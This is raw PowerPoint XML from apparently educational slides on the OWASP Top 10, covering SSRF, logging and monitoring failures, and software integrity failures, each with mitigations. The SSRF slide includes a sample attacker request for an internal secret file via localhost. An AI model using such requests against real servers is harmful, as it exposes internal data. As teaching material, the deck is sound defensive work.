        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D6F9E3-3F31-751B-EB6C-0775A1C0A5C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4100269"/>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7. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{494496D9-61C5-FE5E-2D58-659A070FDCB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5233129"/>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9. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5F65F5-600B-6364-AD2A-793341926B5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="685800"/>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2. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35A1A5E3-1216-44AA-6FC6-167E3E05E226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1818660"/>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4. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A6E387-F4A0-2CFC-E599-824EE276D119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="2951520"/>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6. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C31EED10-C02E-5A59-32B1-E959098B96BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="4084380"/>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8. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E57F7A9-498C-500B-A181-E6BC7DC8C547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="5217240"/>
            <a:ext cx="5791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10. ???</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1386428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99103C6-3112-C2D0-62D2-4FE88265FCE2}"/>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8B398CA4-CC7E-16FC-05B8-B2603B7A3938}"/>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C855ABFE-1E3C-D27C-0020-2CE375FA84E3}"/>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0CF252F5-CB8F-050B-DE0D-B2E2EFB51B48}"/>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6E371A93-F9F9-FA67-3D29-240562BF476C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D2022B-176B-042D-5973-8D89BE99D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6950F4-4826-EEC6-C4DE-355940B8C1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6494085" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>10. Server-Side Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47BCBF81-4452-5120-0727-23E5790A3976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="10744200" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> occurs when fetching a remote resource without validating the user-supplied URL. A server is tricked into making an internal request, which could be used to bypass firewall or access sensitive data </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92CD55B-16D0-96A2-4F80-831C703E90C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10500360" y="59620"/>
            <a:ext cx="1600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CWE-918</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2" descr="Server Side Request Forgery - A10 OWASP Top 10 👁‍🗨">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{596477DC-F51A-319F-DB27-1AFED5CAF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0"/>
            <a:ext cx="7620000" cy="3695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9BBFFA-8AA1-8381-183B-EBEC124CEE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8920336" y="2119704"/>
            <a:ext cx="1544012" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benign Input:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3056AD-21AD-447D-E2C4-28DD26AA1C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="2532222"/>
            <a:ext cx="3730508" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET website.com/meatball.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C076273-D96D-FCC5-B851-1D452A78F193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8920336" y="3090447"/>
            <a:ext cx="1672253" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker Input:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640668D3-34D9-C060-BFAA-1C734891AE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8030054" y="3564083"/>
            <a:ext cx="3857146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET 127.0.0.1/supersecret.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39A40AC8-22B4-462F-C64A-137D3B6E4C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="4306974"/>
            <a:ext cx="3200400" cy="1477328"/>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Sanitize user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce URL schema with positive allow list (whitelist)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable HTTP Redirects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298004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05ED287-3CF7-0F1D-6543-0D06F1AF0243}"/>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1EBFACE7-8B6A-BF42-B6ED-470B08BAEEE1}"/>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38FB35E8-569E-F531-CA6B-7D25A6B9126B}"/>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1C0CF1A6-84F9-44E6-3DD0-F3F5EF2CD27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18825623-E40C-D558-6CC7-899BFDD103F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{130A45C6-4294-655E-9024-9B632684A3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E85328-844C-732E-D7D8-49C7E716A8CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8741496" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>9. Security and Logging Monitoring Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0677F97-92BC-B932-88B4-83F791AA4B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400359" y="1037510"/>
            <a:ext cx="7940778" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Without proper logging and monitoring, threats are difficult to detect, and responding to breaches (incident response) is very difficult</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5CDDBAE-9589-4866-5ADE-A3606A62AA85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8839200" y="59620"/>
            <a:ext cx="326136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CWEs: 117, 223, 532, 778</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C2822D-2D07-845B-51DA-D12DEFE50CDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441222" y="2819400"/>
            <a:ext cx="7940778" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example 1: Hospital data breach occurs. Thousands of health records were modified. Lack of logging and monitoring makes it impossible to (1) trace back date of compromise and (2) who’s records were modified</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98463679-668A-E898-D762-4CB844993A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478298" y="4724400"/>
            <a:ext cx="7732252" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example 2: Invalid logins are not monitored, which makes brute-force login attacks more feasible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C49CD1D6-FC82-6987-F3A2-5D8A61DBB7BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8305800" y="4306974"/>
            <a:ext cx="3200400" cy="2031325"/>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Enable logging for security-related events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up alerts for suspicious activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intrusion Detection Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="Walking into a burning room template : r/MemeTemplatesOfficial">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60982954-C4F0-ADFF-834E-68DE283B5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1496" y="658965"/>
            <a:ext cx="3168980" cy="358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94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53FFD3-D96F-158D-C45D-3A28C83681C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86324F5-D9F4-7A2C-D82A-025426CA714A}"/>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BB8EBF28-ABA8-C47E-1A8D-1BC4C251D9E6}"/>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F71918CF-A392-1B68-B721-A5D9BCC5BE18}"/>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E0AFC300-EAE1-8DBF-3141-ECD911AC4267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2099F59E-64DA-2662-E0AC-BAFC261AA2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EF3B8B-68F5-FF4F-7E38-41A8904EB549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7629012" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>8. Software and Data Integrity Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42BD712B-1DDD-E1A3-2281-D5752573607B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7629012" y="59620"/>
            <a:ext cx="4471548"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CWEs: 345, 353, 426, 502, 565, 784, 829, 830, 915</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DA926D-1695-67A3-87C5-4035CF89D1A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1001405"/>
            <a:ext cx="8001000" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>These failures occur when code and/or infrastructure does not protect against integrity violations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 2" descr="What Happens When You Use Unsigned Code or Software?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A25722C-450D-6760-127B-25E3D68D5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2590800"/>
            <a:ext cx="6858000" cy="38440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432B1C-0577-FF15-DA53-4D5815BE516A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2221468"/>
            <a:ext cx="4916731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SolarWinds attack was an example of this</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EEFADA1-3EE3-F4F5-8206-A7810F9649EC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1066800" y="3276600"/>
              <a:ext cx="611280" cy="10800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Ink 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEFADA1-3EE3-F4F5-8206-A7810F9649EC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1012800" y="3168960"/>
                <a:ext cx="718920" cy="226440"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D734CE2-BBA1-BFC5-7B24-8E24C0E699DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8011118" y="1389892"/>
            <a:ext cx="3599857" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
